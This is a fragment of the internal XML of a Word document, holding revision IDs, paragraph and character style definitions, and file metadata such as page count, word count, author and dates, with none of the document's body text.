    <w:rsid w:val="00D14F5E"/>
    <w:rsid w:val="00D2113F"/>
    <w:rsid w:val="00D26A2B"/>
    <w:rsid w:val="00D36977"/>
    <w:rsid w:val="00D46C4B"/>
    <w:rsid w:val="00D523CC"/>
    <w:rsid w:val="00D52E02"/>
    <w:rsid w:val="00D727D8"/>
    <w:rsid w:val="00D7424C"/>
    <w:rsid w:val="00D84CE4"/>
    <w:rsid w:val="00D92D36"/>
    <w:rsid w:val="00D9320E"/>
    <w:rsid w:val="00D960D5"/>
    <w:rsid w:val="00DA3007"/>
    <w:rsid w:val="00DB7299"/>
    <w:rsid w:val="00DB7C0C"/>
    <w:rsid w:val="00DC01D2"/>
    <w:rsid w:val="00DD0545"/>
    <w:rsid w:val="00DD1410"/>
    <w:rsid w:val="00DF29DD"/>
    <w:rsid w:val="00DF3DFC"/>
    <w:rsid w:val="00E0153E"/>
    <w:rsid w:val="00E02AAA"/>
    <w:rsid w:val="00E03176"/>
    <w:rsid w:val="00E04AC5"/>
    <w:rsid w:val="00E06297"/>
    <w:rsid w:val="00E078D6"/>
    <w:rsid w:val="00E12BC7"/>
    <w:rsid w:val="00E12E4A"/>
    <w:rsid w:val="00E20A2E"/>
    <w:rsid w:val="00E27984"/>
    <w:rsid w:val="00E35731"/>
    <w:rsid w:val="00E52817"/>
    <w:rsid w:val="00E537DB"/>
    <w:rsid w:val="00E6337C"/>
    <w:rsid w:val="00E71A85"/>
    <w:rsid w:val="00E71AB6"/>
    <w:rsid w:val="00E804FA"/>
    <w:rsid w:val="00E86672"/>
    <w:rsid w:val="00E86DD5"/>
    <w:rsid w:val="00E87A92"/>
    <w:rsid w:val="00EA6DC8"/>
    <w:rsid w:val="00EB32E2"/>
    <w:rsid w:val="00ED2A8A"/>
    <w:rsid w:val="00ED30B0"/>
    <w:rsid w:val="00EF3569"/>
    <w:rsid w:val="00EF4D78"/>
    <w:rsid w:val="00F001EA"/>
    <w:rsid w:val="00F00EF2"/>
    <w:rsid w:val="00F11B2B"/>
    <w:rsid w:val="00F12C3D"/>
    <w:rsid w:val="00F1336D"/>
    <w:rsid w:val="00F30BD8"/>
    <w:rsid w:val="00F316A7"/>
    <w:rsid w:val="00F46C8A"/>
    <w:rsid w:val="00F515D4"/>
    <w:rsid w:val="00F51B7D"/>
    <w:rsid w:val="00F62AC9"/>
    <w:rsid w:val="00F76683"/>
    <w:rsid w:val="00F85F39"/>
    <w:rsid w:val="00F9224B"/>
    <w:rsid w:val="00F948CF"/>
    <w:rsid w:val="00F9616C"/>
    <w:rsid w:val="00F96DDF"/>
    <w:rsid w:val="00F97521"/>
    <w:rsid w:val="00FB2070"/>
    <w:rsid w:val="00FD1BE1"/>
    <w:rsid w:val="00FD6468"/>
    <w:rsid w:val="00FE68C0"/>
    <w:rsid w:val="00FF10D1"/>
    <w:rsid w:val="00FF72CD"/>
    <w:rsid w:val="07A4199C"/>
    <w:rsid w:val="083C13F3"/>
    <w:rsid w:val="0AEF09B9"/>
    <w:rsid w:val="0CBF2931"/>
    <w:rsid w:val="0EC95617"/>
    <w:rsid w:val="12344C6A"/>
    <w:rsid w:val="134C6090"/>
    <w:rsid w:val="1C6E46FF"/>
    <w:rsid w:val="1C957527"/>
    <w:rsid w:val="1DCB165B"/>
    <w:rsid w:val="1EE56BE2"/>
    <w:rsid w:val="215F11DA"/>
    <w:rsid w:val="235F42B4"/>
    <w:rsid w:val="24A812E0"/>
    <w:rsid w:val="2A117A08"/>
    <w:rsid w:val="31040BF7"/>
    <w:rsid w:val="33227F0E"/>
    <w:rsid w:val="49454363"/>
    <w:rsid w:val="57910571"/>
    <w:rsid w:val="58AF49B7"/>
    <w:rsid w:val="5DA06CCC"/>
    <w:rsid w:val="61231438"/>
    <w:rsid w:val="6B6047D5"/>
    <w:rsid w:val="6FE15BB5"/>
    <w:rsid w:val="75057C8A"/>
    <w:rsid w:val="77CC76A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1"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="22"/>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9"/>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5">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="23"/>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1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>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3"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="25"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="24"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="28"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="27"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="7"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1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7"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="11"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="10"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="203864" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5597" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:r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Balloon Text Char"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="7"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:leftChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3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F2E702-229A-4F85-8627-EC8CA6015544}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <Pages>41</Pages>
  <Words>5981</Words>
  <Characters>32786</Characters>
  <Lines>222</Lines>
  <Paragraphs>62</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39578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2020-06-17T20:49:00Z</dcterms:created>
  <dc:creator>khushisingla28@outlook.com</dc:creator>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:lastPrinted>2020-06-17T20:50:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-06T09:39:49Z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A2C6A35F148D437A8FBD8F89A6D43276_12</vt:lpwstr>
  </property>
</Properties>
</file>